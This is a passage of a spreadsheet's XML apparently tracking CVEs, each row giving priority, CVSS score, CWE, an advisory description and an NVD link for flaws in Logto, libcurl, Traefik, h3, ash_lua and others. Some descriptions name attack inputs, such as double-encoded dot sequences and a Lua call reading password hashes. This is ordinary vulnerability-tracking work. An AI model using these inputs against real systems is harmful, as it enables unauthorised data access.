        </is>
      </c>
      <c r="C1786" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1786" s="5" t="inlineStr"/>
      <c r="F1786" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1786" s="5" t="inlineStr"/>
      <c r="H1786" s="5" t="inlineStr"/>
      <c r="I1786" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1786" s="5" t="inlineStr"/>
      <c r="K1786" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1786" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M1786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t>
        </is>
      </c>
    </row>
    <row r="1787">
      <c r="A1787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81378</t>
        </is>
      </c>
      <c r="C1787" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1787" s="5" t="inlineStr"/>
      <c r="F1787" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1787" s="5" t="inlineStr"/>
      <c r="H1787" s="5" t="inlineStr"/>
      <c r="I1787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1787" s="5" t="inlineStr"/>
      <c r="K1787" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L1787" s="5" t="inlineStr">
        <is>
          <t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M1787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t>
        </is>
      </c>
    </row>
    <row r="1788">
      <c r="A1788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81379</t>
        </is>
      </c>
      <c r="C1788" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1788" s="5" t="inlineStr"/>
      <c r="F1788" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1788" s="5" t="inlineStr"/>
      <c r="H1788" s="5" t="inlineStr"/>
      <c r="I1788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1788" s="5" t="inlineStr"/>
      <c r="K1788" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="L1788" s="5" t="inlineStr">
        <is>
          <t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M1788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t>
        </is>
      </c>
    </row>
    <row r="1789">
      <c r="A1789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82209</t>
        </is>
      </c>
      <c r="C1789" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1789" s="5" t="inlineStr"/>
      <c r="F1789" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1789" s="5" t="inlineStr"/>
      <c r="H1789" s="5" t="inlineStr"/>
      <c r="I1789" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1789" s="5" t="inlineStr"/>
      <c r="K1789" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L1789" s="5" t="inlineStr">
        <is>
          <t>When libpsl support is enabled, libcurl fails to enforce the Public Suffix
List boundary check when processing a `Set-Cookie` header where the `Domain`
attribute explicitly matches an origin host that is itself a public suffix
(e.g., `Domain=co.uk` set by `co.uk`).
Instead of coercing it into a strict host-only cookie, libcurl saves the
cookie with wildcard domain scope (`.co.uk`). Consequently, the cookie is
inappropriately included in subsequent outbound requests or HTTP redirects to
arbitrary sibling subdomains under the same public suffix (e.g.,
`attacker.co.uk`).</t>
        </is>
      </c>
      <c r="M1789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82209</t>
        </is>
      </c>
    </row>
    <row r="1790">
      <c r="A1790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82262</t>
        </is>
      </c>
      <c r="C1790" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1790" s="5" t="inlineStr"/>
      <c r="F1790" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1790" s="5" t="inlineStr"/>
      <c r="H1790" s="5" t="inlineStr"/>
      <c r="I1790" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1790" s="5" t="inlineStr"/>
      <c r="K1790" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1790" s="5" t="inlineStr">
        <is>
          <t>Logto through 1.42.0 contains a server-side request forgery vulnerability in the POST /api/hooks/:id/test endpoint that accepts arbitrary URLs without host validation. Tenant administrators with Management API tokens can make the server issue HTTP POST requests to internal URLs and retrieve response bodies from services on the private network.</t>
        </is>
      </c>
      <c r="M1790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82262</t>
        </is>
      </c>
    </row>
    <row r="1791">
      <c r="A1791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82263</t>
        </is>
      </c>
      <c r="C1791" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1791" s="5" t="inlineStr"/>
      <c r="F1791" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1791" s="5" t="inlineStr"/>
      <c r="H1791" s="5" t="inlineStr"/>
      <c r="I1791" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1791" s="5" t="inlineStr"/>
      <c r="K1791" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1791" s="5" t="inlineStr">
        <is>
          <t>Logto through 1.42.0 contains a server-side request forgery vulnerability in the OIDC SSO connector creation endpoint that fails to validate the issuer URL parameter. Tenant administrators with Management API credentials can supply arbitrary internal URLs to trigger HTTP GET requests to private network services, with response content returned in API responses.</t>
        </is>
      </c>
      <c r="M1791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82263</t>
        </is>
      </c>
    </row>
    <row r="1792">
      <c r="A1792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82586</t>
        </is>
      </c>
      <c r="C1792" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1792" s="5" t="inlineStr"/>
      <c r="F1792" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1792" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1792" s="5" t="inlineStr"/>
      <c r="I1792" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1792" s="5" t="inlineStr"/>
      <c r="K1792" s="5" t="inlineStr">
        <is>
          <t>CWE-424</t>
        </is>
      </c>
      <c r="L1792" s="5" t="inlineStr">
        <is>
          <t>Improper Protection of Alternate Path vulnerability in ash-project ash_lua allows a user-supplied Lua script to read attributes that are not on the exposed-field allow-list.
AshLua exposes Ash resources to Lua scripts, gated by a manifest declaring which fields are exposed. The read action's operation aggregate path in AshLua.Runtime took the field name straight from the Lua call and resolved it with only String.to_existing_atom and Ash.Query.Aggregate.new!, neither of which consults the exposed-field allow-list the normal fields path enforces. A script can therefore read the value of any attribute of any record the actor may read, including private sensitive?: true columns, via resource.read({ operation = {"list", "hashed_password"} }); min and max give a value oracle. Anyone able to submit or influence a Lua script can reach this.
This issue affects ash_lua: from 0.1.0 before 0.2.1.</t>
        </is>
      </c>
      <c r="M1792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82586</t>
        </is>
      </c>
    </row>
    <row r="1793">
      <c r="A1793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82728</t>
        </is>
      </c>
      <c r="C1793" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1793" s="5" t="inlineStr"/>
      <c r="F1793" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1793" s="5" t="inlineStr"/>
      <c r="H1793" s="5" t="inlineStr"/>
      <c r="I1793" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1793" s="5" t="inlineStr"/>
      <c r="K1793" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1793" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint mint allows a remote HTTP server to exhaust memory on the client host and cause a denial of service.
Two HTTP/1 response-parser states accumulate server data without any cap. In lib/mint/http1.ex, decode_status_line/4 stores the unconsumed data in conn.buffer when the status line is incomplete, and decode_body/5 does the same for an unterminated chunk-extension line. Both wait for a CRLF the server never has to send, and conn.buffer is prepended to every subsequent socket message. The :max_header_list_size budget is wired only into decode_headers/5 and decode_trailer_headers/4, so neither of these states is covered by it. A malicious server, or one reached through an attacker-controlled redirect or a fetched URL, streams bytes indefinitely until the BEAM node is killed by the operating system out-of-memory handler. The chunk-extension variant is reached after a valid status line and a complete, valid header section, so an intermediary inspecting only headers sees an ordinary 200 response.
This issue affects mint: from 0.1.0 before 1.10.0.</t>
        </is>
      </c>
      <c r="M1793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82728</t>
        </is>
      </c>
    </row>
    <row r="1794">
      <c r="A1794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82753</t>
        </is>
      </c>
      <c r="C1794" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1794" s="5" t="inlineStr"/>
      <c r="F1794" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1794" s="5" t="inlineStr"/>
      <c r="H1794" s="5" t="inlineStr"/>
      <c r="I1794" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1794" s="5" t="inlineStr"/>
      <c r="K1794" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1794" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in ash-project ash_authentication_oauth2_server allows an unauthenticated attacker to exhaust database storage and memory.
The /authorize endpoint is unauthenticated by design. With Client ID Metadata Documents enabled, resolve_client/3 in AshAuthentication.Oauth2Server.CIMD fetches the document for each new URL-shaped client_id and upserts a client row, with no cap on the number of rows, no expiry or garbage collection, and no length bound on the fetched fields; the document was also placed in CIMD.Cache before validation, so even rejected documents held cache memory until their TTL. An attacker serving valid documents at many distinct URLs creates one permanent client row per URL, each able to carry multi-megabyte strings, growing storage and memory without bound.
This issue affects ash_authentication_oauth2_server: from 0.3.0 before 0.3.1.</t>
        </is>
      </c>
      <c r="M1794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82753</t>
        </is>
      </c>
    </row>
    <row r="1795">
      <c r="A1795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82869</t>
        </is>
      </c>
      <c r="C1795" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1795" s="5" t="inlineStr"/>
      <c r="F1795" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1795" s="5" t="inlineStr"/>
      <c r="H1795" s="5" t="inlineStr"/>
      <c r="I1795" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1795" s="5" t="inlineStr"/>
      <c r="K1795" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1795" s="5" t="inlineStr">
        <is>
          <t>ToolJet Database versions before v3.16.44 contain a privilege escalation vulnerability in the join_tables endpoint that grants JOIN_TABLES ability to all authenticated users without role or workspace membership validation. Attackers can read arbitrary ToolJet Database tables from any workspace by supplying victim workspace identifiers in the request path while authenticating with their own workspace credentials.</t>
        </is>
      </c>
      <c r="M1795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82869</t>
        </is>
      </c>
    </row>
    <row r="1796">
      <c r="A1796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82871</t>
        </is>
      </c>
      <c r="C1796" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1796" s="5" t="inlineStr"/>
      <c r="F1796" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1796" s="5" t="inlineStr"/>
      <c r="H1796" s="5" t="inlineStr"/>
      <c r="I1796" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1796" s="5" t="inlineStr"/>
      <c r="K1796" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1796" s="5" t="inlineStr">
        <is>
          <t>ToolJet before v3.16.208 fails to validate organization membership in database read routes, allowing any authenticated user to access other organizations' table schemas and row data. Attackers can supply arbitrary organization IDs in URL parameters to list tables, retrieve column definitions, and execute join queries to read actual stored data from victim organizations.</t>
        </is>
      </c>
      <c r="M1796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82871</t>
        </is>
      </c>
    </row>
    <row r="1797">
      <c r="A1797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83939</t>
        </is>
      </c>
      <c r="C1797" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1797" s="5" t="inlineStr"/>
      <c r="F1797" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1797" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1797" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I1797" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1797" s="5" t="inlineStr"/>
      <c r="K1797" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1797" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83939</t>
        </is>
      </c>
    </row>
    <row r="1798">
      <c r="A1798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84370</t>
        </is>
      </c>
      <c r="C1798" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1798" s="5" t="inlineStr"/>
      <c r="F1798" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1798" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1798" s="5" t="inlineStr"/>
      <c r="I1798" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1798" s="5" t="inlineStr"/>
      <c r="K1798" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-79</t>
        </is>
      </c>
      <c r="L1798" s="5" t="inlineStr">
        <is>
          <t>SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 1.0.0 until versions 2.8.4, 3.3.5, and 4.1.0, the opt-in removeScripts plugin, named removeScriptElement in versions 2 and 3, incompletely filters executable links in plugins/removeScripts.js and lib/svgo/tools.js. The plugin does not recognize namespace-prefixed SVG anchor elements such as svg:a with href or namespaced *:href values, and it does not remove ASCII tab, line-feed, or carriage-return characters before checking URL schemes. Browsers remove those characters before parsing a scheme, allowing an executable link to pass the plugin's check. When an application processes attacker-controlled SVG input and serves the result in an active browser context, a victim who activates the surviving link can execute script in the SVG's origin, expose data, modify content, or perform actions as the victim. This issue is fixed in versions 2.8.4, 3.3.5, and 4.1.0.</t>
        </is>
      </c>
      <c r="M1798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t>
        </is>
      </c>
    </row>
    <row r="1799">
      <c r="A1799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85596</t>
        </is>
      </c>
      <c r="C1799" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1799" s="5" t="inlineStr"/>
      <c r="F1799" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1799" s="5" t="inlineStr">
        <is>
          <t>nginx, kubernetes</t>
        </is>
      </c>
      <c r="H1799" s="5" t="inlineStr"/>
      <c r="I1799" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1799" s="5" t="inlineStr"/>
      <c r="K1799" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1799" s="5" t="inlineStr">
        <is>
          <t>Traefik versions &gt;= v3.7.0 and &lt;= v3.7.10 contain an authentication bypass in the Kubernetes Ingress NGINX provider. The TLS option generated for an Ingress carrying the nginx.ingress.kubernetes.io/auth-tls-secret annotation was named after the Ingress namespace and name. As a result, two Ingress objects sharing the same host, the same client CA secret, and the same client-authentication mode produced two distinct TLS option names for that host. Traefik treats this as a TLS options conflict and falls back to the entry point's default TLS configuration, which does not request a client certificate, so a route configured with nginx.ingress.kubernetes.io/auth-tls-verify-client: "on" becomes reachable without a client certificate. Only the v3.7 line is affected; the issue is fixed in v3.7.11.</t>
        </is>
      </c>
      <c r="M1799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85596</t>
        </is>
      </c>
    </row>
    <row r="1800">
      <c r="A1800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85597</t>
        </is>
      </c>
      <c r="C1800" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1800" s="5" t="inlineStr"/>
      <c r="F1800" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1800" s="5" t="inlineStr"/>
      <c r="H1800" s="5" t="inlineStr"/>
      <c r="I1800" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1800" s="5" t="inlineStr"/>
      <c r="K1800" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1800" s="5" t="inlineStr">
        <is>
          <t>Traefik before v2.11.55 and v3.0.0 through v3.7.10 contain a TLS option conflict resolution vulnerability that allows unauthenticated attackers to bypass client-certificate authentication by creating conflicting TLS options on multi-host routers. Attackers can reach protected backends by exploiting shared TLS resolution across multiple hostnames in a single router rule, causing the strict mTLS requirement to fall back to default options for all hosts.</t>
        </is>
      </c>
      <c r="M1800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85597</t>
        </is>
      </c>
    </row>
    <row r="1801">
      <c r="A1801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85730</t>
        </is>
      </c>
      <c r="C1801" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1801" s="5" t="inlineStr"/>
      <c r="F1801" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1801" s="5" t="inlineStr"/>
      <c r="H1801" s="5" t="inlineStr"/>
      <c r="I1801" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1801" s="5" t="inlineStr"/>
      <c r="K1801" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-835</t>
        </is>
      </c>
      <c r="L1801" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">smol-toml </t>
        </is>
      </c>
      <c r="M1801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85730</t>
        </is>
      </c>
    </row>
    <row r="1802">
      <c r="A1802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86145</t>
        </is>
      </c>
      <c r="C1802" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1802" s="5" t="inlineStr"/>
      <c r="F1802" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1802" s="5" t="inlineStr"/>
      <c r="H1802" s="5" t="inlineStr"/>
      <c r="I1802" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1802" s="5" t="inlineStr"/>
      <c r="K1802" s="5" t="inlineStr">
        <is>
          <t>CWE-424</t>
        </is>
      </c>
      <c r="L1802" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48 allows a pcre2_dfa_match out-of-bounds write because reuse of a cached workspace block, in a recursive DFA matching workspace, lacks a size check (even though a newly allocated block, for the same purpose, does have a size check). This outcome requires an attacker-controlled regular expression, or a recursive pattern in conjunction with a small heap limit (this can be set through the API).</t>
        </is>
      </c>
      <c r="M1802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86145</t>
        </is>
      </c>
    </row>
    <row r="1803">
      <c r="A1803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86251</t>
        </is>
      </c>
      <c r="C1803" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1803" s="5" t="inlineStr"/>
      <c r="F1803" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1803" s="5" t="inlineStr"/>
      <c r="H1803" s="5" t="inlineStr"/>
      <c r="I1803" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1803" s="5" t="inlineStr"/>
      <c r="K1803" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1803" s="5" t="inlineStr">
        <is>
          <t>h3 versions before 1.15.9 contain a path traversal vulnerability in the serveStatic utility. A double-decoding flaw allows a request path containing double-encoded dot sequences (e.g. %252e%252e) to be decoded to %2e%2e, which survives resolveDotSegments() because that function only checks for literal '.' characters. When the resulting asset ID is resolved by URL-based backends (CDN, S3, object storage), %2e%2e is interpreted as '..' per RFC 3986, enabling path traversal to read arbitrary files from the backend.</t>
        </is>
      </c>
      <c r="M1803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86251</t>
        </is>
      </c>
    </row>
    <row r="1804">
      <c r="A1804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86253</t>
        </is>
      </c>
      <c r="C1804" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1804" s="5" t="inlineStr"/>
      <c r="F1804" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1804" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1804" s="5" t="inlineStr"/>
      <c r="I1804" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1804" s="5" t="inlineStr"/>
      <c r="K1804" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1804" s="5" t="inlineStr">
        <is>
          <t>h3 (npm package) versions &lt;= 2.0.1-rc.14 contain a path traversal vulnerability in serveStatic(). On Node.js deployments, event.url.pathname is not normalized, so percent-encoded dot segments (%2e%2e) are passed to decodeURI() and decoded to ../ sequences without sanitization. An unauthenticated remote attacker can send crafted requests to endpoints served by serveStatic() to read arbitrary files outside the intended static directory. Fixed in 1.15.6 and 2.0.1-rc.15.</t>
        </is>
      </c>
      <c r="M1804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86253</t>
        </is>
      </c>
    </row>
    <row r="1805">
      <c r="A1805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86258</t>
        </is>
      </c>
      <c r="C1805" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1805" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1805" s="5" t="inlineStr"/>
      <c r="F1805" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1805" s="5" t="inlineStr"/>
      <c r="H1805" s="5" t="inlineStr"/>
      <c r="I1805" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1805" s="5" t="inlineStr"/>
      <c r="K1805" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1805" s="5" t="inlineStr">
        <is>
          <t>nbviewer through 1.0.1 contains a path traversal vulnerability in LocalFileHandler.can_show() that uses string-prefix comparison instead of proper path validation. Attackers can read files from sibling directories outside the configured root by requesting paths that share the root as a textual prefix, disclosing unintended notebooks and credentials.</t>
        </is>
      </c>
      <c r="M1805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86258</t>
        </is>
      </c>
    </row>
    <row r="1806">
      <c r="A1806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86297</t>
        </is>
      </c>
      <c r="C1806" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1806" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1806" s="5" t="inlineStr"/>
      <c r="F1806" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1806" s="5" t="inlineStr"/>
      <c r="H1806" s="5" t="inlineStr"/>
      <c r="I1806" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1806" s="5" t="inlineStr"/>
      <c r="K1806" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-193</t>
        </is>
      </c>
      <c r="L1806" s="5" t="inlineStr">
        <is>
